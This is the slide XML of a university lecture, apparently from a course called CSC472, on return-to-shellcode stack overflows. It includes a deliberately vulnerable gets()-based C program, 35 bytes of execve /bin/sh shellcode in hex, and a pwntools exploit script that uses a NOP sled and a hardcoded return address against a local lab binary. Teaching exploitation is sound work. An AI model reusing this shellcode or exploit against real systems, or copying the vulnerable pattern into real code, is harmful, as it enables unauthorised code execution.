              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas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9100" y="3050000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objdump gave us the bytes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9100" y="3431000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objdump -d execve_stack.o — the same command from Class 7 — dumps the raw opcode bytes for every instruction; we concatenate them in order.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9100" y="4200000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Today's question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9100" y="4581000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Last week these bytes ran because run_payload.c copied them into an executable buffer for us. Today, overflow2.c never does that — we have to land there ourselves.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Where does the shellcode live?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6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9100" y="1190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Inside the buffer we're overflowing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9100" y="1571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There is no separate shellcode file loaded at runtime. The 35 bytes travel inside the same string that overflows array[] — input data becomes executable code.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9100" y="2620000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This only works because NX is off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100" y="3001000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-z execstack (turned off in Class 8, still off today) marks the stack executable. Week 6 turns it back on and this exact payload stops working.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9100" y="4050000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The return address must point into the buffer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9100" y="4431000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Instead of hacked()'s address, we now use an address on the stack — inside our own input — as the new EIP.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The target: overflow2.c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7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19100" y="1047750"/>
            <a:ext cx="4600000" cy="5300000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="11151C"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="7883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19100" y="1047750"/>
            <a:ext cx="4600000" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2477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1266825"/>
            <a:ext cx="4180900" cy="3429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75" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="B7DDD2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>overflow2.c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1771650"/>
            <a:ext cx="4180900" cy="43665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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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/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void hacked()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{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    puts("Hacked by Si Chen!!!!");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}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/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void return_input(void)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{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    char array[80];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    gets(array);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    printf("%s\n", array);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}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/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int main(void)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{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    return_input();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    return 0;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}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50000" y="1150000"/>
            <a:ext cx="3474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Only one change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50000" y="1531000"/>
            <a:ext cx="3474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array[80] instead of array[30] — room for a NOP sled plus 35 bytes of shellcode plus the saved-EBP and return-address bytes.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50000" y="3200000"/>
            <a:ext cx="3474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hacked() is still there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50000" y="3581000"/>
            <a:ext cx="3474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Unused, on purpose — a reminder that having vulnerable code and exploiting it the way you intend are two different skills.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Guessing the shellcode's address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8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9100" y="1190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We don't need the exact byte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9100" y="1571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Stack addresses are consistent for a given binary and environment when ASLR is off (-no-pie, Class 8). Run it once under GDB/GEF and read $esp or the buffer's address.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9100" y="2620000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x/8xw $esp right after the crash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100" y="3001000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Dump the stack around the crash and find where your 0x41414141 filler bytes sit — that tells you roughly where the buffer begins.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9100" y="4050000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"An estimate is often good enough"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9100" y="4431000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You do not need the first byte of the shellcode — you need any byte before it. That is exactly what the next slide's NOP sled buys you.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The NOP sled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9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9100" y="1190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NOP = "do nothing, move to the next byte"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9100" y="1571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0x90 on x86. A run of NOPs is a landing zone: land anywhere inside it and execution slides forward until it reaches our real shellcode.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9100" y="2620000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Why we need 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100" y="3001000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Our address guess from the last slide is approximate. A 20–30 byte NOP sled turns "close enough" into "close enough works."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9100" y="4050000"/>
            <a:ext cx="8305800" cy="1400000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="11151C"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="7883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19100" y="4050000"/>
            <a:ext cx="8305800" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2477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8650" y="4269075"/>
            <a:ext cx="7886700" cy="3429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75" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="B7DDD2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>sled + shellcode, conceptually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4773900"/>
            <a:ext cx="7886700" cy="4665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500" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>payload = b"\x90" * 25 + shellcode + b"A" * pad + p32(guess_addr)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Assembling the full payload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10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50000" y="1120000"/>
            <a:ext cx="883800" cy="6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0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010000" y="1120000"/>
            <a:ext cx="5440000" cy="620000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E7D32"/>
          </a:solidFill>
          <a:ln w="12700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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1300" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>NOP sled — 25 bytes of 0x90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0000" y="1740000"/>
            <a:ext cx="883800" cy="6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0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+0x19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010000" y="1740000"/>
            <a:ext cx="5440000" cy="620000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E7D32"/>
          </a:solidFill>
          <a:ln w="12700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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1300" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>shellcode — 35 bytes (execve_stack)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0000" y="2360000"/>
            <a:ext cx="883800" cy="6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0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+0x3c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010000" y="2360000"/>
            <a:ext cx="5440000" cy="620000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E0E0E0"/>
          </a:solidFill>
          <a:ln w="12700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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1300" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>padding to reach saved EBP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0000" y="2980000"/>
            <a:ext cx="883800" cy="6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0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+0x50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010000" y="2980000"/>
            <a:ext cx="5440000" cy="620000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E0E0E0"/>
          </a:solidFill>
          <a:ln w="12700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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1300" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>saved EBP — 4 junk bytes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000" y="3600000"/>
            <a:ext cx="883800" cy="6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200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+0x54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010000" y="3600000"/>
            <a:ext cx="5440000" cy="620000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A"/>
          </a:solidFill>
          <a:ln w="12700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return address — points into the NOP sled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Writing the exploit (pwntools)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11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19100" y="1047750"/>
            <a:ext cx="8305800" cy="4638675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="11151C"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="7883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19100" y="1047750"/>
            <a:ext cx="8305800" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2477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1266825"/>
            <a:ext cx="7886700" cy="3429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75" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="B7DDD2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>exploit_shellcode.py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1771650"/>
            <a:ext cx="7886700" cy="370522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#!/usr/bin/env python3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from pwn import *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/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context.update(arch='i386', os='linux')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/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def main():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    p = process('./overflow2')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/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    shellcode = bytes.fromhex(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        '31c050682f2f7368682f62696e89e35089e2'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        '5053 89e1b00bcd8031c0b00131db43cd80'.replace(' ', ''))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/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    nop_sled = b'\x90' * 25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    guess_addr = 0xffffd020    # your value from GDB/GEF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    payload = nop_sled + shellcode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    payload += b'A' * (76 - len(payload)) + p32(guess_addr)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/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    p.sendline(payload)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    p.interactive()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/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if __name__ == '__main__':</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    main()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Live demo checklist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12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9100" y="1190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1. Confirm the offset (same as Class 8)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9100" y="1571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gef➤  pattern create 100  →  r &lt; pattern100  →  pattern offset $eip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9100" y="2333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2. Estimate the buffer's stack address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100" y="2714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gef➤  r &lt; payload  →  x/8xw $esp  right before or after the crash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9100" y="3476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3. Run the exploit and prove code execution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9100" y="3857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python3 exploit_shellcode.py  →  interactive shell  →  whoami / id to prove it is really a new shell, not just printed output.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What the stack looks like at the crash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13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0000" y="1080000"/>
            <a:ext cx="1034280" cy="4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050" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1780000" y="108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90</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2540000" y="108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90</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300000" y="108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90</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4060000" y="108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90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0000" y="1500000"/>
            <a:ext cx="1034280" cy="4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050" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+0x04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780000" y="150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…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540000" y="150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…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00000" y="150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…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060000" y="150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11440" y="1500000"/>
            <a:ext cx="1650000" cy="4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1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>NOP sled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0000" y="1920000"/>
            <a:ext cx="1034280" cy="4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050" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+0x08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780000" y="192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31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540000" y="192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c0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300000" y="192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50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060000" y="192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68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0000" y="2340000"/>
            <a:ext cx="1034280" cy="4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050" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+0x4c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780000" y="234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43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40000" y="234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cd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300000" y="234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80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060000" y="2340000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E7D32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00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911440" y="2340000"/>
            <a:ext cx="1650000" cy="4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1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>shellcode tail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0000" y="2760000"/>
            <a:ext cx="1034280" cy="4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050" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+0x50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780000" y="2760000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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41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0000" y="2760000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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41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300000" y="2760000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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41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060000" y="2760000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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41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911440" y="2760000"/>
            <a:ext cx="1650000" cy="4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1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Saved EBP — overwritten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0000" y="3180000"/>
            <a:ext cx="1034280" cy="4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1050" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="55606B"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+0x54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780000" y="3180000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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20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540000" y="3180000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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d0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300000" y="3180000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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ff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060000" y="3180000"/>
            <a:ext cx="760000" cy="420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="3333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Consolas"/>
              </a:rPr>
              <a:t>ff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11440" y="3180000"/>
            <a:ext cx="1650000" cy="4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1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Return Address — points here ↑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Return-hijack vs. return-to-shellcode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14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9100" y="1190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What stayed the same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9100" y="1571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The vulnerability (gets(), no bounds check), the offset-finding technique (cyclic pattern), and the goal (control EIP).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9100" y="2620000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What changed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100" y="3001000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The destination: an existing function's address (Class 8) versus an address inside our own injected bytes (today) — and a NOP sled to make that address forgiving.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9100" y="4050000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Why this second version matters more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9100" y="4431000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Return-to-shellcode generalizes: you are no longer limited to code the programmer already wrote. This is the technique real-world stack exploits build on.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One question for next week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15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9100" y="1450000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Everything today depended on -z execstack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9100" y="1831000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Our shellcode ran because the stack is marked executable. Most real binaries mark it non-executable instead (NX / DEP).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9100" y="2900000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So what happens when it isn't?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100" y="3281000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Same overflow, same control over EIP — but jumping into data instead of code just crashes. Week 6 covers the technique that gets around this.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What's next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16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9100" y="1190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Week 6 (Sep 29 / Oct 1)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9100" y="1571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Stack-overflow exploitation continues with NX/DEP defenses turned back on, and how to debug exploits that stop working once they are.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9100" y="2620000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Quiz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100" y="3001000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Covers Classes 6–9: system calls, shellcode, return-hijack, and return-to-shellcode.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9100" y="4050000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Lab 2: Stack Overflow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9100" y="4431000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Both of this week's targets — overflow.c and overflow2.c — with both attacks as the lab's two parts.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0050" y="161925"/>
            <a:ext cx="8343900" cy="485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References and what comes next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050" y="6505575"/>
            <a:ext cx="20955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55606B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Page · 17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9455" y="6029325"/>
            <a:ext cx="466165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9100" y="1190625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Original course materials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9100" y="1571625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Course archive → Chapter 8: the return-to-shellcode walkthrough and NOP-sled technique.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9100" y="2100000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Current technical references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100" y="2481000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gef.readthedocs.io; docs.pwntools.com; our own Class 7 execve_stack.asm and bin_to_header.py.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9100" y="3010000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All files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9100" y="3391000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wcu.ninja/csc472 → Class 9 slides and the Week 5 code bundle.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9100" y="3920000"/>
            <a:ext cx="8305800" cy="3238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950" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="247793"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Next connection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9100" y="4301000"/>
            <a:ext cx="8305800" cy="7429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25" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>NX/DEP: what changes when the stack stops being executable, and how ret2libc gets around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2026-09-11T20:23:41.2560000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-11T20:23:41.2560000Z</dcterms:modified>
</coreProperties>
</file>